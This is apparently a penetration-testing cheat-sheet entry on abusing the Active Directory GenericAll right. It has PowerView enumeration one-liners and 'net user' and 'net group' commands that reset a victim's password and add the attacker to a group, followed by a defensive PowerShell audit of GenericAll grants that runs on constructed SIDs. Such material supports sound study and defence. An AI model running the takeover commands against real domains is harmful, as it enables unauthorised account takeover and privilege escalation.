GenericAll
GenericAll in Users
Find domain users that the current user has the GenericAll access right to:
PowerView3 > Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} | ? {$_.ActiveDirectoryRights -like "*GenericAll*"}

The attacker can change the password of the discovered users:
Cmd > net user snovvcrash Passw0rd! /domain
GenericAll on Groups
Find domain groups that the current user has the GenericAll access right to:
PowerView3 > Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | % {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | % {if ($_.Identity -eq $("$env:UserDomain\$env:UserName")) {$_}} | ? {$_.ActiveDirectoryRights -like "*GenericAll*"}
The attacker can add users to the discovered groups:
Cmd > net group "IT Desk" snovvcrash /add /domain
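Defender-side audit for the same condition, as an added example that is not part of the original page: it lists Allow ACEs carrying GenericAll whose trustee is not on an expected-admin list. The function name Find-GenericAllAce, the SIDs, the object name and the SDDL string are constructed for illustration.

```powershell
# Added example, not from the original page. SIDs and SDDL below are constructed.
Add-Type -AssemblyName System.DirectoryServices

function Find-GenericAllAce {
    param(
        [Parameter(Mandatory)] [string] $ObjectName,
        [Parameter(Mandatory)] [System.DirectoryServices.ActiveDirectorySecurity] $Acl,
        [string[]] $ExpectedSids = @()   # trustees that are supposed to hold full control
    )
    $genericAll = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll  # 0xF01FF
    $sidType    = [System.Security.Principal.SecurityIdentifier]
    # Explicit and inherited ACEs, trustees returned as SIDs (no name lookups needed)
    foreach ($ace in $Acl.GetAccessRules($true, $true, $sidType)) {
        $rights = [int]$ace.ActiveDirectoryRights
        if ($ace.AccessControlType -ne 'Allow')             { continue }
        if (($rights -band $genericAll) -ne $genericAll)    { continue }
        if ($ace.IdentityReference.Value -in $ExpectedSids) { continue }
        [pscustomobject]@{
            Object    = $ObjectName
            Trustee   = $ace.IdentityReference.Value
            Inherited = $ace.IsInherited
        }
    }
}

# Constructed security descriptor: SYSTEM and Domain Admins (RID 512) hold full
# control, an ordinary account (RID 1105) also does, Authenticated Users can read.
$full   = 'CCDCLCSWRPWPDTLOCRSDRCWDWO'   # the 13 rights AD stores for GenericAll
$domain = 'S-1-5-21-1111111111-2222222222-3333333333'
$sddl   = "O:SYG:SYD:(A;;${full};;;SY)(A;;${full};;;${domain}-512)" +
          "(A;;${full};;;${domain}-1105)(A;;RPRC;;;AU)"

$acl = New-Object System.DirectoryServices.ActiveDirectorySecurity
$acl.SetSecurityDescriptorSddlForm($sddl)

# Anything returned is a full-control grant outside the allow-list
Find-GenericAllAce -ObjectName 'CN=constructed-user' -Acl $acl `
    -ExpectedSids 'S-1-5-18', "${domain}-512"
```

On a domain-joined host with the ActiveDirectory module loaded, the same function accepts the descriptor returned by Get-Acl "AD:\<distinguishedName>" for each user or group object.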